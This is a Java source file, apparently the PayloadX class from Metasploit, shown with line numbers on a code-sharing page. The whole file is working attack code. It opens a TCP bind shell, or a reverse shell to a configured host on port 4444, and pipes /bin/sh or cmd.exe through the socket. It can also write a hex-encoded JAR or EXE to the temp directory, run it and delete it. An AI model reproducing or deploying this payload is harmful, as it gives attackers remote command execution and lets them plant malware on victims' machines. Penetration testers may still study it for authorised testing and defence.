Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package msf.x;
2

3
import java.io.BufferedReader;
4
import java.io.BufferedWriter;
5
import java.io.File;
6
import java.io.FileOutputStream;
7
import java.io.InputStream;
8
import java.io.InputStreamReader;
9
import java.io.OutputStream;
10
import java.io.OutputStreamWriter;
11
import java.net.ServerSocket;
12
import java.net.Socket;
13
import java.security.AccessController;
14
import java.security.PrivilegedExceptionAction;
15

16
public class PayloadX implements PrivilegedExceptionAction
17
{
18
	// This will contain a hex string of the native payload to drop and execute.
19
	public static String data = null;
20
	public static String jar = null;
21
	// If no native payload is set we get either a java bind shell or a java
22
	// reverse shell.
23
	public static String lhost = null;
24
	public static int lport = 4444;
25

26
	class StreamConnector extends Thread
27
	{
28
		InputStream is;
29
		OutputStream os;
30

31
		StreamConnector( InputStream is, OutputStream os )
32
		{
33
			this.is = is;
34
			this.os = os;
35
		}
36

37
		public void run()
38
		{
39
			BufferedReader in = null;
40
			BufferedWriter out = null;
41
			
42
			try
43
			{
44
				in = new BufferedReader( new InputStreamReader( is ) );
45
				out = new BufferedWriter( new OutputStreamWriter( os ) );
46
				char buffer[] = new char[8192];
47
				int length;
48
				while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
49
				{
50
					out.write( buffer, 0, length );
51
					out.flush();
52
				}
53
			}
54
			catch( Exception e ) {}
55

56
			try
57
			{
58
				if( in != null )
59
					in.close();
60
				if( out != null )
61
					out.close();
62
			}
63
			catch( Exception e ) {}
64
		}
65
	}
66

67
	// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
68
	public static byte[] StringToBytes( String s )
69
	{
70
		byte[] data = new byte[s.length() / 2];
71

72
		for( int i = 0 ; i < s.length() ; i += 2 )
73
			data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) );
74

75
		return data;
76
	}
77

78
	public Object run() throws Exception
79
	{
80
		//System.out.println("Running");
81
		// if the native payload data has not been set just return for now, it
82
		// will be set by the next time we reach here.
83
		if( PayloadX.data == null && PayloadX.jar == null )
84
			return null;
85
		//System.out.println("have either data or jar");
86
		
87
		try
88
		{
89
			String os = System.getProperty( "os.name" );
90

91
			//System.out.println("OS: " + os);
92
			// if we have no native payload to drop and execute we default to
93
			// either a TCP bind or reverse shell.
94
			if(
95
					(PayloadX.data == null || PayloadX.data.length() == 0) &&
96
					(PayloadX.jar  == null || PayloadX.jar.length() == 0)
97
			) {
98
				//System.out.println("no, exe/jar. Doing shell");
99
				Socket client_socket = null;
100

101
				String shell = "/bin/sh";
102

103
				if( os.indexOf( "Windows" ) >= 0 )
104
					shell = "cmd.exe";
105

106
				if( PayloadX.lhost == null )
107
				{
108
					ServerSocket server_socket = new ServerSocket( PayloadX.lport );
109
					client_socket = server_socket.accept();
110
				}
111
				else
112
				{
113
					client_socket = new Socket( PayloadX.lhost, PayloadX.lport );
114
				}
115

116
				if( client_socket != null )
117
				{
118
					Process process = exec( shell );
119
					if( process != null )
120
					{
121
						( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
122
						( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
123
					}
124
				}
125
			}
126
			else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) )
127
			{
128
				//System.out.println("Dropping JAR");
129
				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar";
130

131
				writeFile( path, StringToBytes( PayloadX.jar ) );
132
				exec( "java -jar " + path + " " + PayloadX.lhost + " " + PayloadX.lport + " true");
133
			}
134
			else
135
			{
136
				//System.out.println("Dropping EXE");
137
				String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe";
138

139
				writeFile( path, StringToBytes( PayloadX.data ) );
140
				if( os.indexOf( "Windows" ) < 0 )
141
				{
142
					exec( "chmod 755 " + path );
143
				}
144
				exec( path );
145
				new File( path ).delete();
146
			}
147
		}
148
		catch( Exception e ) {
149
			//System.out.println(e);
150
		}
151
		
152
		return null;
153
	}
154

155
	public Process exec( String path )
156
	{
157
		Process p = null;
158
		//System.out.println( "Executing" );
159
		try {
160
			p = Runtime.getRuntime().exec( path );
161
			if( p == null ) 
162
			{
163
				//System.out.println( "Null process, crap" ); 
164
			}
165
			p.waitFor();
166
		} catch( Exception e ) {
167
			//System.out.println(e);
168
		}
169
		return p;
170
	}
171

172
	public void writeFile( String path, byte[] data )
173
	{
174
		//System.out.println( "Writing file" );
175
		try {
176
			FileOutputStream fos = new FileOutputStream( path );
177

178
			fos.write( data );
179
			fos.close();
180
		} catch( Exception e ) {
181
			//System.out.println(e);
182
		}
183
	}
184
	
185
	public PayloadX()
186
	{
187
		try
188
		{
189
			AccessController.doPrivileged( this );
190
		}
191
		catch( Exception e ) {
192
			//System.out.println(e);
193
		}
194
	}
195
}
196

197